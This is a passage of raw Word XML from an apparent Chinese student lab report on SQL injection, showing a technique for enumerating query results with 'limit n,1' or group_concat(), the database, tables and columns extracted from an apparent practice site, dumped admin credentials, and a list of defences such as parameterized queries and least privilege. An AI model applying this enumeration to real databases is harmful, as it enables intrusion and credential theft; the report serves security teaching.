                <w:bCs/>
                <w:kern w:val="2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/>
                <w:bCs/>
                <w:kern w:val="2"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>原因和解决办法：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74FB2DC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11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firstLine="420" w:firstLineChars="200"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20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 w:val="0"/>
                <w:bCs w:val="0"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>使用limit n,1依次遍历数据库表，直到返回值为空。此时n表示该表的表项总数；或使用group_concat()将查询结果合并到1项中再进行输出。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="69B2D97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30" w:hRule="atLeast"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8380" w:type="dxa"/>
            <w:gridSpan w:val="7"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders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59C7638B">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="1140"/>
              </w:tabs>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:kern w:val="2"/>
                <w:sz w:val="24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bCs/>
                <w:kern w:val="2"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>六、实验结果及分析和（或）源程序调试过程</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56CF97AD">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="2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/>
                <w:bCs/>
                <w:kern w:val="2"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>（一）实验结果</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EC29495">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="283" w:leftChars="0" w:hanging="283" w:firstLineChars="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="2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/>
                <w:bCs/>
                <w:kern w:val="2"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>数据库名称：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39D2BC0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11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firstLine="420" w:firstLineChars="200"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20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 w:val="0"/>
                <w:bCs w:val="0"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>maoshe。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D86F8CA">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="283" w:leftChars="0" w:hanging="283" w:firstLineChars="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="2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/>
                <w:bCs/>
                <w:kern w:val="2"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>数据库中的所有表的名称：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E6E58D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11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firstLine="420" w:firstLineChars="200"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20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 w:val="0"/>
                <w:bCs w:val="0"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>admin，dirs，news，xss。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5177F680">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="283" w:leftChars="0" w:hanging="283" w:firstLineChars="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="2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/>
                <w:bCs/>
                <w:kern w:val="2"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>每个表中的字段数量以及字段名：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DA55AA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11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firstLine="420" w:firstLineChars="200"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20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 w:val="0"/>
                <w:bCs w:val="0"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>admin：id,username,password</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="059C31F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11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firstLine="420" w:firstLineChars="200"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20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 w:val="0"/>
                <w:bCs w:val="0"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>dirs：paths</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58811FD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11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firstLine="420" w:firstLineChars="200"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20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 w:val="0"/>
                <w:bCs w:val="0"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>news：id,content</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4458559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11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firstLine="420" w:firstLineChars="200"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20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 w:val="0"/>
                <w:bCs w:val="0"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>xss：id,user,pass</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67FD1112">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="283" w:leftChars="0" w:hanging="283" w:firstLineChars="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="2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/>
                <w:bCs/>
                <w:kern w:val="2"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>管理员账户和密码：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="350BC56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11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firstLine="420" w:firstLineChars="200"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20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 w:val="0"/>
                <w:bCs w:val="0"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>(admin, hellohack)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7628E23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11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firstLine="420" w:firstLineChars="200"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20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 w:val="0"/>
                <w:bCs w:val="0"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>(ppt领取微信, zkaqbanban)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BBBAB7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11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jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="26A42F9A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="2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/>
                <w:bCs/>
                <w:kern w:val="2"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>（二）分析和总结</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B600E5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11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firstLine="420" w:firstLineChars="200"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20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 w:val="0"/>
                <w:bCs w:val="0"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>对SQL注入攻击进行防范包括但不限于以下方法：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13270D9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tabs>
                <w:tab w:val="left" w:pos="11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firstLine="420" w:firstLineChars="200"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20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kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>在编写SQL语句时，应避免直接将变量插入到SQL语句中，而应使用参数化查询或预编译语句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kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>，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kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>确保用户输入的数据被当作数据处理，而不是可执行代码，从而防止SQL注入。例如，在Java中，可以使用PreparedStatement对象；在Python的SQLite库中，可以使用问号（?）作为参数占位符。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="648B035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11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firstLine="420" w:firstLineChars="200"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20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 w:val="0"/>
                <w:bCs w:val="0"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">2. 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kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>对用户输入进行严格的验证和过滤，确保只有符合预期的数据格式和类型的输入被接受。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B9ABF0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11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firstLine="420" w:firstLineChars="200"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20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 w:val="0"/>
                <w:bCs w:val="0"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">3. 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kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>使用白名单策略，只允许特定的字符或字符集通过验证。对于特殊字符（如单引号、双引号、分号等），应进行转义或替换。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="069F004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11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firstLine="420" w:firstLineChars="200"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20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 w:val="0"/>
                <w:bCs w:val="0"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">4. 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kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>数据库连接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kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>应遵循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kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>最小权限原则，即只授予必要的权限。例如，如果某个应用程序只需要读取数据，那么就不应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kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>授予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kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>写入数据的权限。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F7C765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11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firstLine="420" w:firstLineChars="200"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20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 w:val="0"/>
                <w:bCs w:val="0"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">5. 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kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>避免在应用程序中直接显示数据库错误消息，因为这可能会暴露数据库的结构和版本信息，从而增加被攻击的风险。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kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>应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kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>使用自定义的错误消息来通知用户发生了错误，同时记录详细的错误信息以供管理员审查。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5168DCD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11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firstLine="420" w:firstLineChars="200"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20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 w:val="0"/>
                <w:bCs w:val="0"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">6. 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kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>使用Web应用防火墙（WAF）检测和阻止常见的SQL注入。WAF可以监控和分析应用程序的流量，并自动识别和拦截恶意请求。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11BE408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11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firstLine="420" w:firstLineChars="200"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20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 w:val="0"/>
                <w:bCs w:val="0"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">7. 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kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>使用ORM框架（如Hibernate、Entity Framework等）帮助开发者减少直接与数据库交互的机会，从而降低SQL注入的风险。ORM框架通常会自动处理输入验证、参数绑定等安全问题。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B48906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11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ind w:firstLine="420" w:firstLineChars="200"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20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 w:val="0"/>
                <w:bCs w:val="0"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">8. 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kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>保持数据库管理系统和应用程序的最新版本，及时修补已知的安全漏洞。使用监控工具来监控数据库和应用程序的活动，及时发现并应对异常行为。定期审计数据库和应用程序的安全性，检查是否存在潜在的安全风险。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6F2BA577">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
    </w:p>
    <w:sectPr>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="1440" w:right="1800" w:bottom="1440" w:left="180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8E46153"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="98E46153"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="283" w:hanging="283"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        <w:b/>
        <w:bCs w:val="0"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1">
    <w:nsid w:val="B318DE84"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="B318DE84"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="4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188B94D3"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="188B94D3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4187AD23"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="4187AD23"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="283" w:hanging="283"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        <w:b/>
        <w:bCs w:val="0"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="4">
    <w:nsid w:val="5C2A5603"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="5C2A5603"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="283" w:hanging="283"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="5">
    <w:nsid w:val="7172F9DD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7172F9DD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283" w:hanging="283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80" w:hanging="44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320" w:hanging="44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760" w:hanging="44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200" w:hanging="44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640" w:hanging="44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080" w:hanging="44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520" w:hanging="44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960" w:hanging="440"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="2">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="0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useFELayout/>
    <w:doNotUseIndentAsNumberingTabStop/>
    <w:compatSetting w:name="compatibilityMode" w:uri="http://schemas.microsoft.com/office/word" w:val="12"/>
  </w:compat>
  <w:docVars>
    <w:docVar w:name="commondata" w:val="eyJoZGlkIjoiOGY5ODQ2YzNlM2UzNTZkNWRhNWRlYmY3MTJiYzM0OTgifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00D31D50"/>
    <w:rsid w:val="000464C0"/>
    <w:rsid w:val="00125B21"/>
    <w:rsid w:val="00176A93"/>
    <w:rsid w:val="001B0DA1"/>
    <w:rsid w:val="001D5FB4"/>
    <w:rsid w:val="001F3ADA"/>
    <w:rsid w:val="001F5C55"/>
    <w:rsid w:val="00227DCD"/>
    <w:rsid w:val="0028261B"/>
    <w:rsid w:val="0029005F"/>
    <w:rsid w:val="002D37B1"/>
    <w:rsid w:val="00323B43"/>
    <w:rsid w:val="003752C8"/>
    <w:rsid w:val="003D1456"/>
    <w:rsid w:val="003D37D8"/>
    <w:rsid w:val="003F4DEC"/>
    <w:rsid w:val="003F5324"/>
    <w:rsid w:val="00426133"/>
    <w:rsid w:val="00427A62"/>
    <w:rsid w:val="00427AC4"/>
    <w:rsid w:val="004358AB"/>
    <w:rsid w:val="00443E3E"/>
    <w:rsid w:val="00455D87"/>
    <w:rsid w:val="004942C0"/>
    <w:rsid w:val="004D482E"/>
    <w:rsid w:val="004D4C10"/>
    <w:rsid w:val="00541E85"/>
    <w:rsid w:val="00564F3D"/>
    <w:rsid w:val="0057041B"/>
    <w:rsid w:val="005E5EB3"/>
    <w:rsid w:val="00601178"/>
